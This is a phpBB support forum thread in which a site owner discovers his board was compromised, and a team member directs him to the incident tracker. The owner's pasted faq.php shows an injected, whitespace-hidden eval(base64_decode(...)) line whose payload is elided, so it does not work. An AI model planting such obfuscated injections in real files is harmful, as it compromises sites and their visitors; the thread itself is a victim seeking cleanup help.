Hacked?

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Ideas Centre
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
User avatar
brushwoodnursery
Registered User
Posts: 31
Joined: Sat Jan 12, 2008 1:49 am
Location: Philly, PA USA
Contact:

Hacked?

Post by brushwoodnursery »

Never had a problem before but I was looking at my host's log reports and found a huge number of failed requests that looked like this:
[REMOVED LINK]
WARNING!!! Do not click this link unless you have protection. My WOT flagged it as a bad site so I didn't go forward. Sure seems like someone got in and mucked around. I can't FTP in to my host right now and I haven't heard back yet on my support ticket so i came here to see if this is a familiar attack and if anyone has advice on how it happened and how to clean it up.
Last edited by AdamR on Mon Sep 14, 2009 7:53 pm, edited 1 time in total.
Reason: removed link
-Dan
Using all ten thumbs, rusty scalpels and blunt instruments on PHP
User avatar
AdamR
Former Team Member
Posts: 9731
Joined: Tue Mar 02, 2004 5:40 pm
Location: Tampa, Florida
Name: Adam Reyher
Contact:

Re: Hacked?

Post by AdamR »

Sometime definitely isn't right there and could potentially be an attacked board.

Please file a ticket in the Incident Tracker with the following, and a team member will be able to assist you in identifying the problem and assist you in removing any harmful injections from your forum.

1) A zipped backup of your current phpBB folder.
2) A backup of your database.
3) Raw access logs from the time the issue started happening. (you may need to ask your host for these)

- Adam
phpBB Support: Welcome | Userguide | Knowledge Base | Search
Honored supporter of the phpBB Group!
"If I have seen a little further it is by standing on the shoulders of Giants." - Isaac Newton
User avatar
brushwoodnursery
Registered User
Posts: 31
Joined: Sat Jan 12, 2008 1:49 am
Location: Philly, PA USA
Contact:

Re: Hacked?

Post by brushwoodnursery »

Well, can't get in to file system right now. FTP and webFTP are down. Something tells me the issue isn't just our site. They usually respond quickly to support tix and I still haven't heard a word. Pulled a DB backup through the phpbb admin panel and gzipped it down but I suspect the files will be needed for the support ticket here.
-Dan
Using all ten thumbs, rusty scalpels and blunt instruments on PHP
User avatar
AdamR
Former Team Member
Posts: 9731
Joined: Tue Mar 02, 2004 5:40 pm
Location: Tampa, Florida
Name: Adam Reyher
Contact:

Re: Hacked?

Post by AdamR »

Not necessarily. The fileset helps, but isn't necessary. With a database backup, the Incident team can ensure there were no injections into the database. Once the site comes back online, the database can be restored (if needed) and a fresh set of phpBB files used to clean out any code injections.

As there are currently no known security vulnerabilities in phpBB 3.0.x, these incidents happen via third-party software running on the server, or trojans on administrator's computers which steals FTP credentials.

- Adam
phpBB Support: Welcome | Userguide | Knowledge Base | Search
Honored supporter of the phpBB Group!
"If I have seen a little further it is by standing on the shoulders of Giants." - Isaac Newton
User avatar
brushwoodnursery
Registered User
Posts: 31
Joined: Sat Jan 12, 2008 1:49 am
Location: Philly, PA USA
Contact:

Re: Hacked?

Post by brushwoodnursery »

Yo! Host got back to me. FTP was down. Meanwhile, studying my logs it looks like this started back in May. I opened up my faq.php file which was the one that has all of the bad referrers that look funky and it looks pretty funky itself!
Seems like this is the origin of my hack. I guess i need to change some things.

Code: Select all

<?php
/**
*
* @package phpBB3
* @version $Id: faq.php 8479 2008-03-29 00:22:48Z naderman $
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/
																	eval(base64_decode('ZXJyb     insanely huge alphanumeric string in here     UTUw+IjtleGl0KCk7fQ=='));
/**
* @ignore
*/
define('IN_PHPBB', true);
$phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './';
$phpEx = substr(strrchr(__FILE__, '.'), 1);
include($phpbb_root_path . 'common.' . $phpEx);

// Start session management
$user->session_begin();
$auth->acl($user->data);
$user->setup();

$mode = request_var('mode', '');

// Load the appropriate faq file
switch ($mode)
{
	case 'bbcode':
		$l_title = $user->lang['BBCODE_GUIDE'];
		$user->add_lang('bbcode', false, true);
	break;

	default:
		$l_title = $user->lang['FAQ_EXPLAIN'];
		$user->add_lang('faq', false, true);
	break;
}

// Pull the array data from the lang pack
$help_blocks = array();
foreach ($user->help as $help_ary)
{
	if ($help_ary[0] == '--')
	{
		$template->assign_block_vars('faq_block', array(
			'BLOCK_TITLE'		=> $help_ary[1])
		);

		continue;
	}

	$template->assign_block_vars('faq_block.faq_row', array(
		'FAQ_QUESTION'		=> $help_ary[0],
		'FAQ_ANSWER'		=> $help_ary[1])
	);
}

// Lets build a page ...
$template->assign_vars(array(
	'L_FAQ_TITLE'	=> $l_title,
	'L_BACK_TO_TOP'	=> $user->lang['BACK_TO_TOP'])
);

page_header($l_title);

$template->set_filenames(array(
	'body' => 'faq_body.html')
);
make_jumpbox(append_sid("{$phpbb_root_path}viewforum.$phpEx"));

page_footer();

?>
-Dan
Using all ten thumbs, rusty scalpels and blunt instruments on PHP
User avatar
AdamR
Former Team Member
Posts: 9731
Joined: Tue Mar 02, 2004 5:40 pm
Location: Tampa, Florida
Name: Adam Reyher
Contact:

Re: Hacked?

Post by AdamR »

Yes, this is a common injection that we've seen a lot of recently. Again, the team in the Incident Tracker can assist you further. :)

- Adam
phpBB Support: Welcome | Userguide | Knowledge Base | Search
Honored supporter of the phpBB Group!
"If I have seen a little further it is by standing on the shoulders of Giants." - Isaac Newton
User avatar
brushwoodnursery
Registered User
Posts: 31
Joined: Sat Jan 12, 2008 1:49 am
Location: Philly, PA USA
Contact:

Re: Hacked?

Post by brushwoodnursery »

OK, looks like the tracker form worked for me this time. It didn't like my DB gz (maybe too big) but they have the FAQ.php file contents now. Thanks for your help!
Is there a report on this injection some place so i can just go read up on it?
-Dan
Using all ten thumbs, rusty scalpels and blunt instruments on PHP
Locked

Return to “[3.0.x] Support Forum”